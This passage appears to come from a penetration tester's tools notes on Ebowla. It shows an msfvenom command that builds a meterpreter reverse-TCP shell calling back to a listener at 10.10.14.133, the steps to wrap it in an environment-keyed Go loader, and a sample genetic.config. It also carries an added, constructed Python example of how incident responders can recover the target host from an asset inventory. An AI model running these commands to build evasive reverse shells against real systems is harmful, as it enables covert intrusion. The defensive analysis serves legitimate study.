Tools
Ebowla
We encode a payload that is decoded dynamically at run time on the box. The encoding is keyed on environment variables of that box, such as the username and computer name, so the payload only decodes on a host whose values match.
msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.133 LPORT=9001 -f exe > shell.exe
./ebowla.py shell.exe genetic.config
./build_x64_go.sh output/go_symmetric_shell.exe.go morph3-ebowla.exe
An example genetic.config:
...
output_type = GO
...
[[ENV_VAR]]
username = 'morph3'
computername = ''
homepath = ''
homedrive = ''
Number_of_processors = ''
processor_identifier = ''
processor_revision = ''
userdomain = 'acme'
systemdrive = ''
userprofile = ''
path = ''
temp = ''
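Added example (not Ebowla's code and not from the original page): for a responder triaging an environmentally keyed sample, the key space is only as large as the set of candidate environment values, so an asset inventory is enough to identify the host a sample was built for. The key derivation, the XOR keystream and the embedded SHA-256 check are simplifying assumptions rather than Ebowla's actual scheme; the blob and the inventory are constructed.

```python
import hashlib
from itertools import product

def derive_key(values):
    # Assumed model: key = SHA-256 over the lowercased, concatenated values.
    return hashlib.sha256("".join(v.lower() for v in values).encode()).digest()

def xor_stream(data, key):
    # Toy stand-in for the real cipher: XOR with a SHA-256 counter keystream.
    out = bytearray()
    for i in range(0, len(data), 32):
        block = hashlib.sha256(key + i.to_bytes(8, "big")).digest()
        out.extend(b ^ k for b, k in zip(data[i:i + 32], block))
    return bytes(out)

def recover_target(blob, expected_digest, inventory):
    """Try every inventory combination; return the values that decode the blob."""
    names = list(inventory)
    for combo in product(*(inventory[n] for n in names)):
        plain = xor_stream(blob, derive_key(combo))
        # Assumed: the sample carries a digest of its plaintext as a decode check.
        if hashlib.sha256(plain).digest() == expected_digest:
            return dict(zip(names, combo)), plain
    return None, None

# Constructed sample: harmless text keyed to the username/userdomain values
# that are set in the genetic.config shown on this page.
PLAINTEXT = b"constructed harmless sample"
SAMPLE_BLOB = xor_stream(PLAINTEXT, derive_key(("morph3", "acme")))
SAMPLE_DIGEST = hashlib.sha256(PLAINTEXT).digest()

# Constructed asset inventory (values an IR team would pull from AD or a CMDB).
INVENTORY = {
    "username": ["alice", "svc_backup", "morph3", "bob"],
    "userdomain": ["corp", "acme", "lab"],
}

if __name__ == "__main__":
    target, plain = recover_target(SAMPLE_BLOB, SAMPLE_DIGEST, INVENTORY)
    print("sample is keyed to:", target)
    print("decoded:", plain)
```

A sandbox with generic values never decodes the sample, which is why dynamic analysis of such files should run with the affected host's environment values or fall back to this kind of inventory-driven search.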
Nimcrypt2